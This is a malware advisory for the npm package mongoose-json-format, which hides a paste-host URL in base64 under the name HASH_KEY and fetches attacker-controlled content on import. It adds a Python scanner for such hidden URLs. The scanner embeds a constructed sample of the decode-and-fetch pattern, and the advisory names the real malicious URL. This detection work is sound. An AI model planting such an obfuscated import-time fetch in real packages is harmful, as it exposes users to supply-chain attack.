MAL-2026-6499
Malicious code in mongoose-json-format (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (2a3dc63cdceb40d6f0fe338bcdbe589689ab2897f44cbb6b7c3d0192b5bd09c5)

On require(), helpers.js instantiates a Helper whose constructor invokes createLog(). createLog() base64-decodes the string assigned to HASH_KEY (decoding to https://www.jsonkeeper.com/b/XVHGD, an anonymous mutable JSON paste host), fetches that URL, and passes the response body's `data.data` field as `threadContent` to createLogger() from the `log-format-thread` dependency. The package's advertised purpose is formatting Mongoose JSON output; there is no legitimate reason for it to retrieve content from a paste host at import time. The URL is hidden via base64 and given the misleading name HASH_KEY. Because jsonkeeper.com content is attacker-mutable and the fetched bytes are handed to a dependency for processing, any consumer that require()s this package becomes a vehicle for arbitrary attacker-controlled content delivered at import time.
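The obfuscation described above (a URL stored as a base64 literal under an innocuous name, decoded and fetched at import time) is cheap to detect statically. The script below is an added example, not part of this advisory or of the package's own code: it scans JavaScript source for `name = "<base64>"` assignments, decodes each candidate with strict validation, and reports the ones that decode to an http(s) URL. The `SAMPLE_HELPERS_JS` text is a constructed stand-in modelled on the described behaviour, and the URL it hides is a placeholder, not the one named in the advisory.

```python
import base64
import binascii
import re
import sys

# Constructed sample, modelled on the pattern the advisory describes: a base64
# literal under a misleading name (HASH_KEY) that a constructor decodes and
# fetches on require(). The URL is a placeholder, not the advisory's URL.
PLACEHOLDER_URL = "https://paste.example.invalid/b/PLACEHOLDER"
ENCODED_PLACEHOLDER = base64.b64encode(PLACEHOLDER_URL.encode()).decode()
# A benign base64 literal, so the scan has something it must NOT report.
BENIGN_B64 = base64.b64encode(b"just some binary config bytes").decode()

SAMPLE_HELPERS_JS = f"""
const HASH_KEY = "{ENCODED_PLACEHOLDER}";
const FORMAT_VERSION = "v2";
const DEFAULT_CONFIG = "{BENIGN_B64}";
class Helper {{
  constructor() {{ this.createLog(); }}
  createLog() {{
    const url = Buffer.from(HASH_KEY, "base64").toString();
    fetch(url).then(r => r.json()).then(j => createLogger(j.data.data));
  }}
}}
module.exports = new Helper();
"""

# `identifier = "literal"` or `identifier: "literal"` where the literal is made
# only of base64 alphabet characters and is long enough to hold a URL.
_ASSIGN_RE = re.compile(
    r"""(?P<name>[A-Za-z_$][\w$]*)\s*[=:]\s*["'](?P<lit>[A-Za-z0-9+/]{16,}={0,2})["']"""
)
_URL_RE = re.compile(r"^https?://[^\s\"'<>]+$")


def decode_if_url(literal: str):
    """Return the decoded URL if `literal` is strictly valid base64 for an
    http(s) URL; otherwise None. Strict validation avoids false positives
    from ordinary identifiers that merely look like base64."""
    try:
        text = base64.b64decode(literal, validate=True).decode("utf-8")
    except (binascii.Error, ValueError):  # UnicodeDecodeError is a ValueError
        return None
    return text if _URL_RE.match(text) else None


def find_hidden_urls(source: str):
    """Scan JS source for base64 literals that decode to URLs.
    Returns a list of (variable_name, decoded_url) in source order."""
    hits = []
    for m in _ASSIGN_RE.finditer(source):
        url = decode_if_url(m.group("lit"))
        if url is not None:
            hits.append((m.group("name"), url))
    return hits


def scan_files(paths):
    """Scan each file path; returns {path: [(name, url), ...]} for files with hits."""
    report = {}
    for path in paths:
        with open(path, encoding="utf-8", errors="replace") as fh:
            hits = find_hidden_urls(fh.read())
        if hits:
            report[path] = hits
    return report


if __name__ == "__main__":
    # With no arguments, scan the constructed sample; otherwise scan the given files.
    if len(sys.argv) > 1:
        for path, hits in scan_files(sys.argv[1:]).items():
            for name, url in hits:
                print(f"{path}: {name} decodes to {url}")
    else:
        for name, url in find_hidden_urls(SAMPLE_HELPERS_JS):
            print(f"sample: {name} decodes to {url}")
```

Run it over the contents of a freshly installed package directory (for example `node_modules/<package>/*.js`) before allowing it into a build. A hit is a review prompt, not a verdict: a base64-encoded URL is unusual enough in a formatting library to justify reading the surrounding code to see whether it is fetched at import time, as described here.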
Affected packages
No fixed version published yet for mongoose-json-format (npm). Pin to a known-safe version or switch to an alternative.